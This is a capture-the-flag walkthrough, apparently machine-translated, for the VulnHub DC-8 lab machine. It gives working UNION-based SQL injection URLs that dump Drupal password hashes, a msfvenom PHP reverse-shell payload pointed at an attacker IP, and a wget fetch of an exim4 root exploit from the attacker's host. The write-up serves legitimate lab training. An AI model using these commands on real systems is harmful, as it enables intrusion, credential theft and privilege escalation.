Introduce

series ： DC（ This series consists of 10 platform ）
Release date ：2019 year 9 month 8 Japan
difficulty ： intermediate
Flag： The ultimate goal of this challenge is to bypass two factor authentication , obtain root Access and read unique Flag
Study ：

• sql Inject
• Website hanging horse
• exim4 Raise the right

Target address ：https://www.vulnhub.com/entry/dc-8,367/
Get tips from the shooting range ：

• The target is more suitable for Virtualbox

information gathering

The host found

netdiscover The host found
about VulnHub For the target , appear “PCS Systemtechnik GmbH” It's the target .

netdiscover -i eth0 -r 192.168.1.0/24

Host information detection

Information detection ：nmap -A -p- 192.168.1.125, Only open 22 and 80 port

Visit website

Know that the website is drupal Site , Didn't get any valuable information .

Directory scanning

No valuable clues were found , The only thing that seems useful is the login page ：http://192.168.1.125/user

dirb http://192.168.1.125/ | grep -v 403

Vulnerability discovery

The directory scan found nothing interesting , I can only come back and click on the website , When you click on the content in the red box , Find out url There are... In the column id In the transformation , You can try whether it exists sql Inject

Errors can be reported directly in single quotation marks , There's something wrong

manual SQL Joint query injection

1. Judging the number of columns , That is the 1 Column

Purpose ： Only guess the number of columns , The next step is to determine which columns can be used
Ideas ： Use order by Keyword sorts columns in the database .
If the number of columns is correct, it can be displayed normally , Otherwise it will go wrong , The number of columns is determined by dichotomy

http://192.168.1.125/?nid=1 order by 1--+

2. Data query & information gathering （union select）

Need to know , Content of page , Which column is displayed
Method ： Give Way id False value , To execute the following statement

Because I have only 1 Column , So I directly inquired , Relatively simple .

1. Get database version 、 name

 Query the database name ： d7db 
http://192.168.1.125/?nid=-1 union select database() --+

 Query database version ：10.1.26-MariaDB-0+deb9u1
http://192.168.1.125/?nid=-1 union select version() --+

3. Get the table name of the database

The following two commands are equivalent , By searching “users” Relevant data table is found .

http://192.168.1.125/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database()--+
http://192.168.1.125/?nid=-1%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='d7db'--+

4. Query the column name information under the specified table name

Notice the presence of ：name and pass Two

http://192.168.1.125/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

5. Query the specified column to get data

when users In the table name、pass Columns of data , There are two user names admin and john And the ciphertext encrypted by the password

http://192.168.1.125/?nid=-1 union select group_concat(name,':',pass) from users --+

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

6. Burst code

Successfully burst out john The password for is ：turtle. as for admin User's password , Let the software background run first

rebound shell

according to DC7 Drone aircraft Experience , It is estimated that the Trojan horse can also write a sentence through the text editor shell. because webshell Manage the font size of the tool 、 The background color is not convenient for screenshot display , So I still use msf To do it .

 Create a back door 
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.118 lport=4444 -f raw

 Turn on monitoring 
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit

 Get interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

After entering malicious code , Click at the bottom of the page “ application ” Button , Then go back to the previous page , Click on the just edited “Content Us” page

Just type in something , Click on “Submit” Button , Get shell

Raise the right

Here's the picture , There is only one user on the target dc8user, No valuable information was found .

Try sudo Raise the right ：find / -perm -u=s -type f 2>/dev/null
Find one exim4 command ,exim It's one in Unix The mail service used on the system ,exim4 When in use, it has root jurisdiction .

exim4 Raise the right

How to use it? Just search on the Internet , The following operations are searched from the Internet .

1. determine exim4 Version of ：/usr/sbin/exim4 --version

2. Search for relevant local authorization utilization codes ：searchsploit exim

3. Post using code

kali Get ready ：
cp /usr/share/exploitdb/exploits/linux/local/46996.sh getShell.sh
python3 -m http.server 80

 Target preparation ：
wget http://192.168.1.118/getShell.sh
chmod +x getShell.sh
./getShell.sh -m netcat

Get Flag